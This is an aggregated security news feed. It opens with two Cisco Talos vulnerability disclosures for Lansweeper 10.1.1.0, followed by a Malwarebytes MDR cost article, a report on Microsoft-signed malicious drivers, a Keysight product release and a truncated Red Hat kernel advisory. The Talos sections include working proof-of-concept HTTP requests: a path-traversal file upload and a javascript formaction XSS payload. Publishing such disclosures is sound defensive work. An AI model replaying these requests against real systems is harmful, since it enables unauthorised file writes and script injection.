A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

An exploitable directory traversal vulnerability is related with an action: Assets -> choose any asset -> Docs -> Add document and is located inside the \LS\WS\AssetActions.cs file. Let us take a close look at the vulnerable source code :

    Line 1 	else if (page.IsPostBack && current.Request["action"] == "addDoc")
    Line 2 	{
    Line 3 
    Line 4 		if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
    Line 5 		{
    Line 6 			string text5 = Path.GetFileName(fileup.PostedFile.FileName);
    Line 7 			string text6 = Guid.NewGuid().ToString();
    Line 8 			int value6 = int.Parse(current.Request["assetId"]);
    Line 9 			string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
    Line 10			WebUser webUser2 = (WebUser)current.Session["Webuser"];
    Line 11			string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
    Line 12			string[] allowedExtensions = General.AllowedExtensions;
    Line 13			string text8 = Path.GetExtension(fileup.FileName).ToLower();
    Line 14			if (txtdocname.Text != "")
    Line 15			{
    Line 16				text5 = txtdocname.Text + text8;
    Line 17			}
    Line 18			bool flag = false;
    Line 19			string[] array = allowedExtensions;
    Line 20			for (int i = 0; i < array.Length; i++)
    Line 21			{
    Line 22				if (array[i] == text8)
    Line 23				{
    Line 24					flag = true;
    Line 25				}
    Line 26			}
    Line 27			string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
    Line 28			string filename = text9 + text6 + "_" + text5;
    Line 29			if (!Directory.Exists(text9))
    Line 30			{
    Line 31				Directory.CreateDirectory(text9);
    Line 32			}
    Line 33			try
    Line 34			{
    Line 35				if (!flag)
    Line 36				{
    Line 37					text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
    Line 38					throw new CustomException(text4);
    Line 39				}
    Line 40				fileup.PostedFile.SaveAs(filename);
    

Uploading a file (document), an attacker can use the txtdocname (Display name in web GUI) variable to provide an alternative filename which is not sanitized at all in a context of directory traversal. Next, that name is concatenated in a simple way with a path to DOCS directory lines 27-28. Lack of proper txtdocname sanitization allows an attacker to upload a file to an arbitrary destination within the file system.

**Exploit Proof of Concept**

REQUEST

    POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
    Host: 192.168.0.102:81
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: pl,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
    Content-Length: 644
    Origin: http://192.168.0.102:81
    Connection: close
    Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
    Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
    Upgrade-Insecure-Requests: 1
    
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="__VIEWSTATE"
    
    
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
    Content-Type: application/vnd.ms-powerpoint
    
    ATTACKER CONTROLED CONTENT
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="txtdocname"
    
    ..\..\..\HACKED
    -----------------------------23614898975253108242957970650
    Content-Disposition: form-data; name="btnOK"
    
    Upload
    -----------------------------23614898975253108242957970650--
    

RESPONSE

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/html; charset=utf-8
    Expires: -1
    Vary: Accept-Encoding
    Server: Microsoft-IIS/8.0
    x-frame-options: SAMEORIGIN
    X-AspNet-Version: 4.0.30319
    X-Powered-By: ASP.NET
    Date: Mon, 06 Jun 2022 14:53:18 GMT
    Connection: close
    Content-Length: 159
    
    <script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32573: TALOS-2022-1528 || Cisco Talos Intelligence Group

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**SUMMARY**

A cross-site scripting (xss) sanitization vulnerability bypass exists in the SanitizeHtml functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary Javascript code injection. An attacker can send an HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

**PRODUCT URLS**

lansweeper - https://www.lansweeper.com/

**CVSSv3 SCORE**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-184 - Incomplete Blacklist

**DETAILS**

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

Lansweeper developers allow users to use certain html tags together with chosen attributes in content added/created by users, e.g. News, Ticket text, etc. To avoid malicious XSS attacks, data which might contain such code is sanitized before being added to the page content. We can see such a sanitization example in the widget responsible for News presentation:

    Line 1 	\App_Web_2mmqsorv\ASP\widgets_helpdesknews_aspx.cs
    Line 2 			
    Line 3 			Dictionary<int, News> dictionary = (from row in NewsController.GetClonedCachedNews().AsEnumerable()
    Line 4 				where row.value.Enabled
    Line 5 				select row).ToDictionary((KeyValuePair<int, News> row) => row.Key, (KeyValuePair<int, News> row) => row.Value);
    Line 6 			if (dictionary.Values.Count > 0)
    Line 7 			{
    Line 8 				__w.Write("\r\n        <div id=\"news\" style=\"overflow: auto; line-height: normal;\">\r\n            <div>\r\n                <table>\r\n                    <tbody>\r\n                        ");
    Line 9 				foreach (News objNews in dictionary.objNewss)
    Line 10				{
    Line 11					__w.Write("\r\n                                <tr>\r\n                                    <td valign=\"top\">\r\n                                        ");
    Line 12					if (objNews.Type != 5)
    Line 13					{
    Line 14						__w.Write("\r\n                                            <img alt=\"\" src=\"");
    Line 15						__w.Write(General.PathPrefix());
    Line 16						__w.Write("images/p");
    Line 17						__w.Write(HttpUtility.HtmlEncode(objNews.Type));
    Line 18						__w.Write(".png\"/>\r\n                                        ");
    Line 19					}
    Line 20					__w.Write("\r\n                                    </td>\r\n                                    <td width=\"100%\">");
    Line 21					__w.Write(HtmlSanitizer.SanitizeHtml(objNews.GetTextTranslation(LS.User.Current().Lang)));
    Line 22					__w.Write("</td>\r\n                                </tr>\r\n                        ");
    Line 23				}
    Line 24				__w.Write("\r\n                    </tbody>\r\n                </table>\r\n            </div>\r\n        </div>  \r\n    ");
    Line 25			}
    

as we can see in line 21 before news text is written to the page content, it’s being sanitized by HtmlSanitizer.SanitizeHtml method. Let us take a look at HtmlSanitizer class implementation:

    Line 1 	LS\Extensions\HtmlSanitizer\HtmlSanitizer.cs
    Line 2 	(...)
    Line 3 			public static HtmlSanitizer CustomHtmlSanitizer()
    Line 4 			{
    Line 5 				HtmlSanitizer htmlSanitizer = new HtmlSanitizer();
    Line 6 				string text = "width height style align valign";
    Line 7 				string[] array = new string[58]
    Line 8 				{
    Line 9 					"h1", "h2", "h3", "h3", "h4", "h5", "h6", "strong", "b", "i",
    Line 10					"em", "thead", "tbody", "tr", "br", "p", "div", "span", "ul", "u",
    Line 11					"pre", "sub", "sup", "strike", "hr", "center", "dl", "dt", "dd", "abbr",
    Line 12					"address", "article", "aside", "bdi", "canvas", "caption", "cite", "code", "col", "colgroup",
    Line 13					"datalist", "dfn", "figcaption", "footer", "header", "kbd", "mark", "nav", "noscript", "picture",
    Line 14					"summary", "s", "samp", "section", "small", "tfoot", "var", "wbr"
    Line 15				};
    Line 16				foreach (string tagName in array)
    Line 17				{
    Line 18					htmlSanitizer.Tag(tagName).AllowAttributes(text);
    Line 19				}
    Line 20				htmlSanitizer.Tag("img").AllowAttributes(text + " src title alt crossorigin ismap longdesc usemap");
    Line 21				htmlSanitizer.Tag("table").AllowAttributes(text + " border cellpadding cellspacing rules sortable summary");
    Line 22				htmlSanitizer.Tag("td").AllowAttributes(text + " colspan rowspan headers");
    Line 23				htmlSanitizer.Tag("ol").AllowAttributes(text + " start reversed type");
    Line 24				htmlSanitizer.Tag("font").AllowAttributes(text + " color face size");
    Line 25				htmlSanitizer.Tag("a").AllowAttributes(text + " href dowload hreflang media media_query rel target type").RemoveEmpty();
    Line 26				htmlSanitizer.Tag("video").AllowAttributes(text + " controls autoplay loop muted poster preload src");
    Line 27				htmlSanitizer.Tag("source").AllowAttributes(text + " src type media");
    Line 28				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 29				htmlSanitizer.Tag("area").AllowAttributes(text + " alt coords download href hreflang media rel shape target type");
    Line 30				htmlSanitizer.Tag("audio").AllowAttributes(text + " autoplay controls loop muted preload src");
    Line 31				htmlSanitizer.Tag("bdo").AllowAttributes(text + " dir");
    Line 32				htmlSanitizer.Tag("blockquote").AllowAttributes(text + " cite");
    Line 33				htmlSanitizer.Tag("button").AllowAttributes(text + " autofocus disabled form formaction formenctype formmethod formnovalidate formtarget name type value");
    Line 34				htmlSanitizer.Tag("del").AllowAttributes(text + " cite datetime");
    Line 35				htmlSanitizer.Tag("ins").AllowAttributes(text + " cite datetime");
    Line 36				htmlSanitizer.Tag("details").AllowAttributes(text + " open");
    Line 37				htmlSanitizer.Tag("dialog").AllowAttributes(text + " open");
    Line 38				htmlSanitizer.Tag("label").AllowAttributes(text + " for");
    Line 39				htmlSanitizer.Tag("li").AllowAttributes(text + " value");
    Line 40				htmlSanitizer.Tag("map").AllowAttributes(text + " name");
    Line 41				htmlSanitizer.Tag("menu").AllowAttributes(text + " label type");
    Line 42				htmlSanitizer.Tag("menuitem").AllowAttributes(text + " checked command default disabled icon label type");
    Line 43				htmlSanitizer.Tag("q").AllowAttributes(text + " cite");
    Line 44				htmlSanitizer.Tag("th").AllowAttributes(text + " abbr colspan headers rowspan scope sorted");
    Line 45				htmlSanitizer.Tag("time").AllowAttributes(text + " datetime");
    Line 46				htmlSanitizer.Tag("track").AllowAttributes(text + " default kind label src srclang");
    Line 47				htmlSanitizer.RemoveComments = true;
    Line 48				htmlSanitizer.ForbiddenElements.Add("script");
    Line 49				htmlSanitizer.ForbiddenElements.Add("style");
    Line 50				htmlSanitizer.TransformLinks = true;
    Line 51				return htmlSanitizer;
    Line 52			}
    Line 53
    Line 54			public static string SanitizeHtml(string html, params string[] WhiteList)
    Line 55			{
    Line 56				string text = "";
    Line 57				try
    Line 58				{
    Line 59					text = new SimpleHtmlParser().ParseString(html).OuterXml;
    Line 60				}
    Line 61				catch (Exception ex)
    Line 62				{
    Line 63					ErrorLogging.LogToFile(ex, "Parser error");
    Line 64					text = html;
    Line 65				}
    Line 66				text = CustomHtmlSanitizer().Sanitize(text);
    Line 67				HtmlDocument htmlDocument = new HtmlDocument();
    Line 68				htmlDocument.LoadHtml(text);
    Line 69				SanitizeCss(htmlDocument.DocumentNode);
    Line 70				if (htmlDocument.DocumentNode.ChildNodes.Count == 0 || htmlDocument.DocumentNode.ChildNodes.Count > 1)
    Line 71				{
    Line 72					return "<div style=\"font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;\">" + htmlDocument.DocumentNode.InnerHtml.Trim() + "</div>";
    Line 73				}
    Line 74				return htmlDocument.DocumentNode.InnerHtml.Trim();
    Line 75			}
    Line 76	(...)
    

That’s of course just a part of this class, but we can observe more or less what the assumptions are, etc. This class contains a list of allowed html tags and their attributes the user might use in the text. There are also additional checks for particular attributes (for example, for href where developers check whether it does not start with a schema different than “http/https”). Unfortunately developers allow a tag like button with its attribute formaction and do not sanitize it at all. This gives a potential attacker the possibility to inject malicious javascript code, which will be triggered after the user clicks the button.

**Exploit Proof of Concept**

REQUEST POST /configuration/MainPage/MainPageActions.aspx?action=editnews&id=3 HTTP/1.1 Host: 192.168.0.102:81 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0 Accept: _/_ Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 438 Origin: http://192.168.0.102:81 Connection: close Referer: http://192.168.0.102:81/configuration/MainPage/ Cookie: UserSettings=language=1; ASP.NET\_SessionId=ke33dhy3jtng0hcwed2fe5av; custauth=username=hacker&userdomain=;

    __VIEWSTATE=&editnewstext=<button style="width: 500px;height:500px" form="formc" formaction="javascript:alert(1)">click me</button>&newsid=3
    

RESPONSE HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/8.0 x-frame-options: SAMEORIGIN X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Thu, 09 Jun 2022 10:15:53 GMT Connection: close Content-Length: 150

    {"ErrorType":"","Error":false,"Emsg":"","AddedRows":[],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
    

**TIMELINE**

2022-06-27 - Vendor Disclosure  
2022-11-29 - Vendor Patch Release  
2022-12-01 - Public Release

Discovered by Marcin 'Icewall' Noga of Cisco Talos.

CVE-2022-32763: TALOS-2022-1541 || Cisco Talos Intelligence Group

Categories: Business
How much can you really save leveraging an outsourced SOC versus building your own in-house? How much ROI can MDR provide over the long-term? In this post, we’ll answer each of these questions and more.



(Read more...)




The post Is an outsourced SOC worth it? Looking at the ROI of MDR appeared first on Malwarebytes Labs.

In the turbulent world of cybersecurity, one thing is for certain: Threats are evolving in ways that make them harder for organizations to predict—and stop.

For businesses with scarce security staff resources and disconnected, complex toolsets, keeping up with today’s cyberthreats is even harder. That’s why an outsourced **Security Operations Center (SOC)** is a great option for resource-constrained organizations.

A SOC, or team of professionals who monitor and respond to threats for your business, is a staple of **Managed Detection and Response (MDR)** services. MDR is an outsourced service which provides organizations with 24x7 attack prevention, detection, and remediation, as well as targeted and risk-based threat hunting.

If you’re an organization wanting to reap the benefits of a 24/7 SOC, then MDR might just be the best bang for their buck. But hold up.

How much can you really save leveraging an outsourced SOC versus building your own in-house? How much ROI can MDR provide over the long-term? And are there any downsides to consider?

In this post, we’ll answer each of these questions and more.

**In-house SOC vs outsourced SOC costs****In-house SOC costs**

Spoiler alert: building an in-house SOC costs a heck of a lot more than partnering with an MDR provider. There’s quite a long (and expensive) checklist of things you’ll need to have, including:

*   **Hire a minimum of five, full-time employees** to provide 24/7 coverage.
*   **Identify effective avenues to find, hire, and replenish** high-caliber security talent.
*   **Develop an employee loyalty** and retention program.

If we really get down to the nitty-gritty, there’s a slew of other costs and logistical hurdles you’ll have to take on:

*   **Purchase, implement, and maintain** the hardware and software for your SOC.
*   **Project manage** the facility operations and day-to-day functions.
*   **Provide ongoing security training, certifications, and red team exercises** to expand staff expertise.
*   **Purchase and manage** third-party security intelligence feeds.
*   **Engage periodic outside consultation** to assess the caliber of your detection and response services and invest in appropriate items to make any recommended improvements

Some estimates place the capital costs to establish a SOC at close to $1.3 million USD—and annual recurring costs running up almost $1.5 million USD. Not exactly dirt-cheap, to say the least.

**Outsourced SOC costs**

Outsourced SOCs, such as those provided by MDR services, are much more cost-efficient than building out your own.

Pricing for MDR is typically calculated based on the number of assets in your environment, somewhere in the ballpark of **$8-12 USD per device/log source.**

Some vendors will look at additional factors for pricing, including number of ingress/egress points and the daily rate of ingestion for SIEM. Cost will also be influenced by any customer-specific pricing (including any discounts) and the breadth of services contracted (more features, for example).

Assuming the average number of endpoints (servers, employee computers, mobile devices) for a small to mid-sized company is 750, **you’re looking at dishing out a cool 6K to 9K a month for MDR.**

All in all, the cost of MDR comes out at around 100K annually—quite a difference from the 7 figures we talked about with in-house!

**Long-term ROI of MDR**

Sure, when it comes to reaping the benefits of a 24x7 SOC, MDR is cheaper than building out your own—but that’s only one part of the picture. We should also look at the ROI of MDR and break down any savings we can expect over the long-term.

The two most obvious examples of the ROI of MDR are:

1.  **It removes the full-time employee** staffing costs of hiring five analysts to run a 24/7 SOC, and;
2.  **It alleviates the capital expenditures** of purchasing a SIEM or other security tools.

But that’s not all. There’s several other aspects of cost avoidance with MDR, including:

*   **Reduced risk of data breach**: With a team of seasoned professionals monitoring your network 24x7, you’re less likely to get hit with a data breach. **In 2022 the average cost of a data breach was $4.35 million.**
*   **Savings attributed to reduction in security incidents**: Infected (and therefore inoperable) devices greatly impacted worker productivity. MDR can reduce worker downtime and reduce necessary IT resources for remediation.
*   **Savings on cyber insurance**: Cyber insurers want 24/7 detection and response in an environment. MDR satisfies this requirement for businesses, saving you potentially tens of thousands of dollars in premiums and other costs annually.

All this being said, there is one big factor to consider before jumping into MDR, and it has to do with control.

MDR providers will have access to sensitive network and endpoint data in order to monitor your infrastructure for threats. And although many MDR vendors have ways to secure/obfuscate that data, some organizations may still be wary of having their data handled by an outside organization.

**When it comes to great security and high ROI, MDR is tough to beat**

MDR is a cost-efficient way to reap the benefits of a 24/7 SOC for organizations who lack the budget to set one up themselves.

With MDR, organizations have access to a round-the-clock team of experts to threat hunt, stay on top of the latest adversary tools, techniques, and procedures (TTPs), and quickly remediate threats as necessary, among other things.

Get a deep dive into the Malwarebytes MDR service

Want to learn more MDR, but not sure where to start? We’ve got you covered. Here are list of resources we think you’ll find helpful:

*   Introducing Malwarebytes Managed Detection and Response (MDR)
*   How to choose an MDR vendor: 6 questions to ask
*   Cyber threat hunting for SMBs: How MDR can help 
*   A cyber threat hunter talks about what he’s learned in his 16+ year cybersecurity career

Is an outsourced SOC worth it? Looking at the ROI of MDR

By Habiba Rashid
Researchers at Sophos X-Ops Rapid Response (RR), Mandiant, and SentinelOne have confirmed Microsoft's blunder.
This is a post from HackRead.com Read the original post: Microsoft-Signed Drivers Helped Hackers Breach System Defenses

Evidence suggests that the Cuba ransomware gang used malicious hardware drivers certified by Microsoft’s Windows Hardware Developer Program in an attempted ransomware attack.

Remember when, in 2021, **a report surfaced** that revealed Microsoft had signed a driver called Netfilter, and later it turned out it contained malware? Well, it has happened again, but on a larger scale.

Sophos X-Ops Rapid Response (RR) recently discovered evidence which proves that threat actors potentially belonging to the Cuba ransomware gang used malicious hardware drivers certified by Microsoft’s Windows Hardware Developer Program in an attempted ransomware attack. 

Drivers — the software that allows operating systems and apps to access and communicate with hardware devices — require highly privileged access to the operating system and its data, which is why Windows requires drivers to bear an approved cryptographic signature before allowing the driver to load.

However, cybercriminals have long since found approaches to **exploit vulnerabilities** found in existing Windows drivers from legitimate software publishers. These hackers make an effort to progressively move up the trust pyramid, using increasingly well-trusted cryptographic keys to digitally sign their drivers. 

**Sophos** along with researchers from **Google-owned Mandiant** and SentinelOne warned Microsoft about these signed malicious drivers which were being planted into targeted machines using a variant of the BurntCigar loader utility. These two then worked in tandem to kill processes associated with **antivirus (AV)** and endpoint detection and response (EDR) products. 

“Ongoing Microsoft Threat Intelligence Center analysis indicates the signed malicious drivers were likely used to facilitate post-exploitation intrusion activity such as the deployment of ransomware,” Microsoft **said in an advisory** published as part of its monthly scheduled release of security patches, known as Patch Tuesday.

On left is a valid signature identified by Mandiant – On the right is a valid signature identified by Sophos

Microsoft concluded its investigation by stating that “no compromise has been identified,” and proceeded to suspend the partners’ seller accounts. Moreover, they released Windows security updates to revoke the abused certificates. 

Mandiant’s report is available **here**. In SentinelOne’s **blog post**, the security firm reported that it had seen several attacks where a threat actor used malicious signed drivers to evade security products which usually trust components signed by Microsoft.

The threat actors were observed to be targeting organisations in the business process outsourcing (BPO), telecommunications, entertainment, transportation, MSSP, financial and cryptocurrency sectors and in some instances, **SIM swapping was the end goal**.

Code signing overview

Cuba Ransomware group was identified to be involved in gaining $60 million from attacks against 100 organisations globally, according to **a joint advisory** earlier this month from the US Cybersecurity and Infrastructure Security Agency (CISA) and the FBI.

The advisory also included warnings regarding the ransomware group which has been active since 2019 and continues to attack US entities in critical infrastructure, including financial services, government facilities, healthcare and public health, and critical manufacturing and information technology.

This is not the first time threat actors have used drivers signed by Microsoft in their operations, as we know it, and it seems that putting a stop to this practice has **not been an easy task for Microsoft**.

1.  **Microsoft Office Most Exploited Software in Malware Attacks**
2.  **BlueBleed Breach Microsoft Exposed 2.4 TB of Customer Data**
3.  **Microsoft security patch bypassed to drop Formbook malware**
4.  **Retired Software Boa Exploited To Target Power Grids, Microsoft**
5.  **Malware Apps Signed with Hacked Android Platform Certificates**

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Microsoft-Signed Drivers Helped Hackers Breach System Defenses

**SANTA ROSA, Calif.--**(BUSINESS WIRE)--Keysight Technologies, Inc. (NYSE: KEYS), a leading technology company that delivers advanced design and validation solutions to help accelerate innovation to connect and secure the world, announced the new APS-M8400 Modular Network Cybersecurity Test Platform, which provides data center network equipment manufacturers (NEM) and operators with the industry’s highest density 8-port 400GE Quad Small Form Factor Pluggable Double Density (QSFP-DD) network security test platform.

Data center operators and service providers are facing exponential growth in encrypted traffic volumes and security threats driven by increases in video streaming, cloud computing, artificial intelligence (AI), machine learning (ML), and internet of things (IoT) devices. In addition, with the introduction of 400GE, critical infrastructure is placed under even greater demand as these growing volumes of encrypted traffic are being delivered at unprecedented speed. To meet these requirements, data center NEMs and operators need tools that can validate that their products and services support hyperscale loads without compromising security and usability.

Keysight’s APS-M8400 addresses this challenge by delivering a modular, 400GE network security test platform that aggregates compute and field programmable gate array (FPGA) resources to deliver hyperscale application and cybersecurity test and validation.

The APS-M8400 test platform offers the following benefits:

*   **Industry leading 400GE port density:** The APS-M8400 offers the ability to test 8 x 400GE QSFP-DD, supporting industry moves from 100GE to 400GE without the need for additional switches or infrastructure.
*   **Ease of management:** The APS-M8400 provides a centralized, “single pane of glass” management of up to 16 compute nodes reducing the management learning curve and simplifying system upgrades and maintenance.
*   **Flexible testing options:** The APS-M800 offers flexible aggregation of compute and FPGA resources to optimize the performance and scalability requirements for any simulated workload, using one or multiple 400GE test interfaces.
*   **Hyperscale performance:** The APS-M8400 can drive hyperscale application and cybersecurity test performance, including encrypted traffic loads, to effectively emulate the rigorous demands put upon data center and service provider infrastructure. This platform can generate up to 3+ Tbps of Layer 4-7 traffic, 5+ billion concurrent connections, 2.4 Tbps of transport layer security (TLS) traffic, and 2.4 million TLS connections per second.
*   **Scalable solution:** The APS-M8400 is designed as a “pay-as-you-grow" solution, allowing users to build out a system that supports today’s test needs and spending constraints, with the flexibility to add capacity as requirements change and budgets allow.

**John Maddison, Executive Vice President of Products and Chief Marketing Officer at Fortinet, said:** “The world’s fastest NGFWs need an equally nimble testing platform to validate their capabilities. Fortinet is the only vendor delivering 400GE interface speeds on a hyperscale firewall via the FortiGate 7121F, 4800F, and 3700F. Keysight’s groundbreaking 8x400GE APS-M8400 cybersecurity test platform delivers the port density, multi-terabit application and TLS throughput rates, and session scalability that help Fortinet test and validate the performance and real-time threat protection our customers expect.”

**Ram Periakaruppan, Vice President and General Manager, Keysight's Network Test and Security Solutions, said:** “Data center NEMs and operators face conflicting demands to produce solutions that support ever increasing data volumes and traffic speeds driven by new standards like 400GE, while protecting systems against a growing, dynamic cybersecurity threat landscape - all without breaking the bank. Keysight’s APS-8400 meets these teams where they are, delivering hyperscale application and cybersecurity test loads via an industry leading 8 x 400GE of test port density in a flexible solution that allows users to add test capacity as demands and budgets change."

**Resources**

*   APS-M8400 Network Cybersecurity Test Platform

**About Keysight Technologies**

Keysight delivers advanced design and validation solutions that help accelerate innovation to connect and secure the world. Keysight’s dedication to speed and precision extends to software-driven insights and analytics that bring tomorrow’s technology products to market faster across the development lifecycle, in design simulation, prototype validation, automated software testing, manufacturing analysis, and network performance optimization and visibility in enterprise, service provider and cloud environments. Our customers span the worldwide communications and industrial ecosystems, aerospace and defense, automotive, energy, semiconductor and general electronics markets. Keysight generated revenues of $5.4B in fiscal year 2022. For more information about Keysight Technologies (NYSE: KEYS), visit us at www.keysight.com.

Additional information about Keysight Technologies is available in the newsroom at https://www.keysight.com/go/news and on Facebook, LinkedIn, Twitter and YouTube.

Keysight Announces 400GE Network Cybersecurity Test Platform

Red Hat Security Advisory 2022-8973-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include buffer overflow, code execution, memory leak, out of bounds write, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2022:8973-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8973  
Issue date:        2022-12-13  
CVE Names:         CVE-2022-1158 CVE-2022-2639 CVE-2022-2959   
                   CVE-2022-21123 CVE-2022-21125 CVE-2022-21166   
                   CVE-2022-23816 CVE-2022-23825 CVE-2022-26373   
                   CVE-2022-29900 CVE-2022-29901 CVE-2022-43945   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: KVM: cmpxchg_gpte can write to pfns outside the userspace region  
(CVE-2022-1158)

* kernel: openvswitch: integer underflow leads to out-of-bounds write in  
reserve_sfa_size() (CVE-2022-2639)

* kernel: watch queue race condition can lead to privilege escalation  
(CVE-2022-2959)

* kernel: nfsd buffer overflow by RPC message over TCP with garbage data  
(CVE-2022-43945)

* hw: cpu: incomplete clean-up of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* hw: cpu: incomplete clean-up of microarchitectural fill buffers (aka  
SBDS) (CVE-2022-21125)

* hw: cpu: incomplete clean-up in specific special register write  
operations (aka DRPW) (CVE-2022-21166)

* hw: cpu: AMD: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-23816, CVE-2022-29900)

* hw: cpu: AMD: Branch Type Confusion (non-retbleed) (CVE-2022-23825)

* hw: cpu: Intel: Post-barrier Return Stack Buffer Predictions  
(CVE-2022-26373)

* hw: cpu: Intel: RetBleed Arbitrary Speculative Code Execution with Return  
Instructions (CVE-2022-29901)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* sched/pelt: Fix attach_entity_load_avg() corner case (BZ#2105360)

* RHEL9[fleetwood][P9]:kdump fails to capture vmcore when crash is  
triggered while running forkoff. (BZ#2109144)

* ISST-LTE:[P10 Everest] [5.14.0-70.9.1.el9_0.ppc64le] HPT:RHEL9.0:ecolp95:  
lpar crashed at __list_del_entry_valid+0x90/0x100 and LPM failed  
(BZ#2112823)

* [rhel9] livepatch panic: RIP: 0010:0xffffffffc0e070c4  
seq_read_iter+0x124/0x4b0 (BZ#2122625)

* System crashes due to list_add double add at  
iwl_mvm_mac_wake_tx_queue+0x71 (BZ#2123315)

* [Dell EMC 9.0 BUG] Any process performing I/O doesn't fail on degraded  
LVM RAID and IO process hangs (BZ#2126215)

* [HPEMC RHEL 9.0 REGRESSION] net, e810, ice: not enough device MSI-X  
vectors (BZ#2126491)

* RHEL9.0 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127874)

* Enable check-kabi (BZ#2132372)

* Add symbols to stablelist (BZ#2132373)

* Update RHEL9.1 kabi tooling (BZ#2132380)

* kABI: Prepare the MM subsystem for kABI lockdown (BZ#2133464)

* [Dell Storage 9.1 BUG] NVME command hang during storage array node reboot  
(BZ#2133553)

* WARNING: CPU: 116 PID: 3440 at arch/x86/mm/extable.c:105  
